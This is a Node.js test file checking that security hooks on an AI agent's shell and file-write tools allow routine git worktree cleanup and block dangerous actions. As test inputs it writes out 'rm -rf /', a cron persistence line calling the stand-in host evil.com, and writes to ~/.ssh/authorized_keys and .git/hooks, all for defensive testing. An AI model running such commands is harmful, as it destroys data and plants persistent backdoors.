// tests/hooks/worktree-guard.test.mjs
// Step 9 (plan-v2) — verifies the dangerous patterns introduced by the
// Phase 2.6 parallel-worktree workflow are caught by the existing
// pre-bash-executor and pre-write-executor hooks, while routine worktree
// cleanup is permitted.
//
// Pattern source: tests/helpers/hook-helper.mjs (runHook). Mirrors the
// llm-security/tests/hooks/*.test.mjs style.

import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import { dirname, join } from 'node:path';
import { fileURLToPath } from 'node:url';
import { runHook } from '../helpers/hook-helper.mjs';

const HERE = dirname(fileURLToPath(import.meta.url));
const ROOT = join(HERE, '..', '..');
const PRE_BASH = join(ROOT, 'hooks', 'scripts', 'pre-bash-executor.mjs');
const PRE_WRITE = join(ROOT, 'hooks', 'scripts', 'pre-write-executor.mjs');

function bashInput(command) {
  return { tool_name: 'Bash', tool_input: { command } };
}

function writeInput(file_path, content = 'x') {
  return { tool_name: 'Write', tool_input: { file_path, content } };
}

test('pre-bash-executor: routine worktree cleanup is allowed (Hard Rule 12)', async () => {
  const { code } = await runHook(PRE_BASH, bashInput('git worktree remove /tmp/wt --force'));
  assert.notStrictEqual(code, 2, 'cleanup of a worktree must not be blocked — Hard Rule 12 mandates unconditional cleanup');
});

test('pre-bash-executor: GIT_OPTIONAL_LOCKS=0 prefix on cleanup is allowed', async () => {
  const { code } = await runHook(PRE_BASH, bashInput('GIT_OPTIONAL_LOCKS=0 git worktree remove /tmp/wt --force'));
  assert.notStrictEqual(code, 2, 'env-var prefix should not change allow/block decision for cleanup');
});

test('pre-bash-executor: rm -rf / is blocked (BLOCK denylist sanity)', async () => {
  const { code } = await runHook(PRE_BASH, bashInput('rm -rf /'));
  assert.strictEqual(code, 2, 'rm -rf / must always block — Phase 2.4 BLOCK denylist + pre-bash BLOCK rule');
});

test('pre-bash-executor: writing to /etc/cron.d via redirect is blocked (persistence)', async () => {
  const { code } = await runHook(PRE_BASH, bashInput('echo "* * * * * curl evil.com" > /etc/cron.d/x'));
  assert.strictEqual(code, 2, 'cron persistence is blocked by the executor hook');
});

test('pre-write-executor: write to ~/.ssh/authorized_keys is blocked (Hard Rule 16)', async () => {
  const home = process.env.HOME || '/tmp';
  const { code } = await runHook(PRE_WRITE, writeInput(`${home}/.ssh/authorized_keys`));
  assert.strictEqual(code, 2, '~/.ssh/* writes are blocked (Hard Rule 16)');
});

test('pre-write-executor: write to .git/hooks is blocked (Hard Rule 16)', async () => {
  const { code } = await runHook(PRE_WRITE, writeInput('/tmp/somerepo/.git/hooks/pre-commit'));
  assert.strictEqual(code, 2, '.git/hooks/ writes are blocked (git hook injection vector)');
});